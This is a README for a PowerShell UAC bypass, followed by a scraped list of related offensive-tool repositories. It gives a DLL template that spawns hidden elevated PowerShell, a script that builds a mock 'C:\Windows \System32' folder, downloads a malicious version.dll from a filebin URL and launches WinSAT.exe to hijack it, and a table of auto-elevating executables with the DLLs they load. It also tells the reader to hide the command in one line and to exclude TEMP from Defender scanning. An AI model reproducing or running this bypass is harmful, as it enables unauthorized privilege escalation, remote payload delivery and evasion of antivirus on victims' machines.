A UAC bypass written in powershell

Overview

Powershell UAC bypass

Originally discovered by Daniel Gebert


Table of Contents
  1. Deployment
  2. Explanations
  3. Auto elavate applications

Deployment

First edit the file to download your malicous DLL from Filebin
To easiliy create said DLL - I would modify This template with the code below

dllmain.c

#include "pch.h"
#include "prxdll.h"
#include "windows.h"
BOOL APIENTRY DllMain(
	const HINSTANCE instance,
	const DWORD reason,
	const PVOID reserved)
{
	switch (reason) {
	case DLL_PROCESS_ATTACH:
		WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command \"Start-Process -verb runas powershell\" \"'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE\" '\"", 1);
		DisableThreadLibraryCalls(instance);
		return prx_attach(instance);
	case DLL_PROCESS_DETACH:
		prx_detach(reserved);
		break;
	}
	return TRUE;
}

This should execute some powershell code as admin.
Next we need to find some autoelavate applications. I prefer to use winSAT.exe as there is no visual GUI when ran. Heres some other Auto elavate applications.

Okay so the you need to edit the powershell source code

New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
Start-Process -Filepath 'C:\windows \System32\winSAT.exe'
Start-Sleep -s 1
Remove-Item '\\?\C:\Windows \' -Force -Recurse

First modification:
Build your DLL using visual studio code and upload it to filebin. My DLL adds a windows defender preference to not scan the TEMP directory
Replace the Invoke-WebRequest Uri with your link and replace the copy argument with the location of your windows application.
Now for the final step - Replace every new line with a semicolon and convert it into a batch script

powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"

And boom! You can execute that system command bypass UAC!

Remember - you can program this into most high level languages - as all you need to do is execute a system command!



Explanations

What Is UAC

Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short terms - UAC aims to improve the security of Microsoft Windows by giving programs standard user privileges until an administrator authorizes an increase or elevation of permissions. Wikipedia


DLL Hijacking

DLL Hijacking means a program will load and execute a malicious DLL contained in the same folder as a data file opened by these programs. Wikipedia


Mock directories

Heres a description I stole from daniels blog

Mock directories are folders with a trailing space. For example \

C:\Windows \System32

See the space " " between "Windows" and "\System32".\

Auto elavate applications

Executable

DLL

Comment

ComputerDefaults.exe

profapi.dll

Can also bypass UAC using other methods.

EASPolicyManagerBrokerHost.exe

profapi.dll

fodhelper.exe

profapi.dll

Opens settings and can be used to bypass UAC using other methods

FXSUNATD.exe

version.dll

msconfig.exe

version.dll

Can also bypass UAC using other methods

OptionalFeatures.exe

profapi.dll

Opens Windows Optional Features

sdclt.exe

profapi.dll

Can also bypass UAC using other methods; opens Windows Backup

ServerManager.exe

profapi.dll

ServerManager.exe is not present by default

systemreset.exe

version.dll

sysprep.exe

version.dll

Creates sub folder. Sysprep process has to be killed directly after UAC bypass, otherwise sysprep is executed!

SystemSettingsAdminFlows.exe

version.dll

WinSAT.exe

version.dll

WSReset.exe

profapi.dll

Opens Windows Store

Owner
Matt
Message me on discord loser MattOverride#6768
Matt
Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving

Beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving "cmd.exe" by using DCOM object.

Chris Au 77 Jul 30, 2022
EarlyBird: a poc of using the tech with syscalls on powershell.exe

EarlyBird: a poc of using the tech with syscalls on powershell.exe injecting cobalt strike shellcode to powershell.exe using EarlyBird Tech USAGE: fir

null 47 Jan 22, 2022
ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only

Fivem-Bypass ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only Not Working? Run as admin and disable your antivirus. How to use 1. Put y

Sarnax 30 Jul 23, 2022
UAC - Cheat developer platform

UAC UAC - Cheat developer platform A long time ago there was an idea to implement my own anti-cheat that would help me in detecting my shortcomings in

Artemiy 23 Aug 10, 2022
This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.

UAC bypass - DLL hijacking Description This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification. Summary

null 194 Aug 8, 2022
An open-source replacement for Windows UAC

Custom UAC What is it It is an open source replacement of UAC. It was a successor of my previous project UAC Renderer. As the functionalities and usag

null 3 Mar 6, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 583 Aug 7, 2022
OffensivePH - use old Process Hacker driver to bypass several user-mode access controls

offensiveph OffensivePH is a post-exploitation tool that utilizes an old Process Hacker driver to bypass several user-mode access controls. Usage Comp

Red Section 260 Jul 25, 2022
LMAO, its WinP4wn! A dead simple way to bypass company Group-Policies.

Win32.WinP4wn.dropper LMAO, its WinP4wn! A dead simple way to bypass a company Group-Policies. Abstract Win32.WinP4wn is a small dropper that uses an

Timo Sarkar 4 Jun 20, 2022
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Cobalt Strike BOF - Inject AMSI Bypass Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. Running inje

boku 295 Aug 7, 2022
This is a library that can bypass the hidden api restriction on Android 9-12.

BypassHiddenApiRestriction This is a library that can bypass the restrictions on non-SDK interfaces on Android 9-12.

Wind 48 Jul 31, 2022
Automatically inject a DLL into the selected process with VAC3 bypass.

FTP LOADER Automatically inject a DLL into the selected process with VAC3 bypass. This will only, most likely, work only with source engine games in s

null 18 Aug 26, 2021
bypass BeaconEye

bypass BeaconEye Hook_Sleep1 只适配了4.3的默认profile,作为demo测试食用,修改配置文件过后 这两处可能需要更改,自行调试 Hook_Sleep2 使用方式: 生成payload.bin -> deal.py处理成result.bin -> 重命名result

LiHua 89 Jul 9, 2022
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 224 Aug 3, 2022
osu!auth integrity check bypass

Note This is for research purposes only! I'm releasing this to help improve osu's anticheat solution. if you'd like to contact me, please do so on dis

hoshikuzu 10 Oct 26, 2021
Auto updating integrity check bypass for Roblox

auto-updating-memcheck Auto updating integrity check bypass for Roblox Before you use Put the "zylib" folder in your include directory Place the "util

Jayden 5 Apr 26, 2022
Bypass Roblox's Trustcheck via the JNZ address of it

What is a Trustcheck? Roblox has a check to see if the URL that was inputted is trusted by them or not, this can be bypassed via 2 options. You can ei

Rexi 4 Aug 3, 2022
An unidentifiable mechanism that helps you bypass GFW.

trojan An unidentifiable mechanism that helps you bypass GFW. Trojan features multiple protocols over TLS to avoid both active/passive detections and

Trojan-GFW 16.2k Aug 10, 2022
Manticore - iOS Jailbreak based on cicuta virosa by ModernPwner and Pattern F's pre-jailbreak's amfid bypass.

Manticore Jailbreak Manticore Jailbreak is a Free and Open-Source Jailbreak utility developed by the Manticore Team. Current compatibility: iOS 14.0 -

Project Manticore 225 Aug 9, 2022